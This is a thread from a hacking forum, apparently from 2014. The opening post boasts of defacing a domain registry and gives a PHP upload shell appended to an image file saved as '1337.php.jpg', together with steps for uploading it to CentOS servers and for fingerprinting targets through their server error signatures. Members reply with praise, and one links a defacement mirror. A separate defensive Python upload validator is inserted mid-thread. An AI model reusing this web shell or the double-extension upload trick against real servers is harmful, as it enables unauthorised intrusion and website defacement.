
CentOS Shell Upload 0day

  • 3 Vote(s) - 5 Average

04-10-2014, 11:23 PM #1
1337 Offline Don't PM me for help, post it on forum ! *******
Posts:525 Threads:106 Joined:Jun 2012 Reputation: 21
Mood: Hacker
Assalamu Alaikum, HellO and Hi Everyone !
Few months ago, you might have seen that I had defaced NIC.me (.ME Official Domain Registry)
I was just checking for some bugs and I found an image upload option.
I tried Tamper Data but it failed.
I then decided to add a php upload code into an image that I had on my desktop.
I simply right-clicked an image that I had on my desktop and edited it with Notepad++.
At the end of the image code, I added :
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
And saved that image as 1337.php.jpg

Once you have saved it, your computer will open and show that image as a normal picture. In that case, when you upload it on a CentOS server that allows image upload, the system detects the image code and thinks it's safe to upload. Once it is uploaded, the CentOS server gets confused and takes that image as a normal .php file.
Open that image with the php code that you uploaded, and Wallahh !

How to know if a server is running on CentOS ?
You can see it by HTTP Live Header. If you don't know much about HTTP Live Header, try to make the site give you an error like 404 Page Not Found or 403 Forbidden. On that page, see the server's signature. You will see it like Apache/2.2.15 (CentOS) Server at http://www.target.com Port 80

This exploit/vulnerability was discovered by 1337 from TeaM MaDLeeTs

[#] CodeName: 1337
[#] Email: [email protected]
[#] Zone-H: http://zone-h.org/archive/special=1/notifier=1337
[#] Facebook: https://www.facebook.com/MaDLeeTs.phtm
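
A server-side check for the upload pattern described in the post above (an image with code appended, saved as `1337.php.jpg`), added here as a defensive example that is not part of the original post. Python is used for illustration; the function names, the extension list and the sample bytes are assumptions constructed for this example.

```python
import secrets

# Extensions a web server may map to a script handler (illustrative, not exhaustive).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "py"}
# Leading magic bytes -> the single extension the stored file is allowed to carry.
MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png",
         b"GIF87a": "gif", b"GIF89a": "gif"}
# Heuristic only: these byte runs can also occur by chance in real image data.
CODE_MARKERS = (b"<?php", b"<?=")

# Constructed sample inputs: a minimal JPEG-like byte string, and the same
# bytes with a harmless PHP comment appended after the end-of-image marker.
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9"
POLYGLOT = CLEAN_JPEG + b"<?php /* constructed marker */ ?>"

def script_segments(filename):
    """Every dot-separated segment after the base name that is a script extension."""
    return [p for p in filename.lower().split(".")[1:] if p in SCRIPT_EXTS]

def sniff_type(data):
    """Extension implied by the file's leading bytes, or None."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None

def check_upload(filename, data):
    """Return (accepted, stored_name, reasons) for one uploaded file."""
    reasons = []
    bad = script_segments(filename)
    if bad:
        reasons.append("script extension in name: " + ",".join(bad))
    ext = sniff_type(data)
    if ext is None:
        reasons.append("content is not a recognised image")
    lowered = data.lower()
    for marker in CODE_MARKERS:
        if marker in lowered:
            reasons.append("embedded code marker: " + marker.decode())
    if reasons:
        return False, None, reasons
    # The main control: discard the client's name, store under a random
    # base name with exactly one extension taken from the sniffed type.
    return True, secrets.token_hex(16) + "." + ext, reasons

if __name__ == "__main__":
    print(check_upload("1337.php.jpg", POLYGLOT))
    print(check_upload("holiday.jpg", CLEAN_JPEG))
```

The rename is what removes the double extension; serving the upload directory with script handlers disabled covers the cases the marker scan misses.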



04-10-2014, 11:38 PM #2
3thicaln00b Offline MadLeets Vip ******
Posts:33 Threads:2 Joined:Sep 2012 Reputation: 0
Mood: None
Cool find, good work cheers

04-10-2014, 11:44 PM #3
_Banti Offline Junior Member **
Posts:3 Threads:1 Joined:Apr 2014 Reputation: 0
Mood: None
niceee workk

04-10-2014, 11:47 PM #4
owenks Offline Mad Lover *****
MaDLeeTs LoVer
Posts:41 Threads:1 Joined:Aug 2012 Reputation: 0
Mood: Worried
Nice share, Biggrinsmiley
language of your code is indonesia, who are you?? Biggrinsmiley

Thanks for share. Smiley1

04-10-2014, 11:55 PM #5
H4CK3R $P1D3R Offline Respected *****
Posts:91 Threads:32 Joined:Nov 2013 Reputation: 0
Mood: Hacker
thanx br0

04-10-2014, 11:59 PM #6
Skull Offline Advance Hacker ***
TeaM MaDLeeTs
Posts:132 Threads:13 Joined:Jun 2013 Reputation: 0
Mood: Mad
THANKS dudE Biggrinsmiley

Mirror ( http://dark-h.org/hacker/?s=1&user=PakCyberSkullz )
Pak Leets Biggrinsmiley team MadLeets Biggrinsmiley

04-11-2014, 12:05 AM #7
n4KuLa_ Offline MadLeets Vip ******
Posts:9 Threads:0 Joined:Apr 2014 Reputation: 0
Mood: None
Thanks You So Much brooo :blush:

04-11-2014, 12:07 AM #8
H4x0rl1f3 Offline Commander In Cheif *******
Posts:1,129 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
Bullz Finally Out wink

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!

04-11-2014, 12:18 AM #9
maskhush Offline Respected *****
Posts:262 Threads:27 Joined:Oct 2013 Reputation: 0
Mood: None
Thanks brother good work


04-11-2014, 12:20 AM #10
AZ Sn1ff3r (PCP) Offline Mad Lover of Security ******
Posts:461 Threads:46 Joined:Mar 2013 Reputation: 0
Mood: Mad
Gr8t Thankx 4 share Smiley1
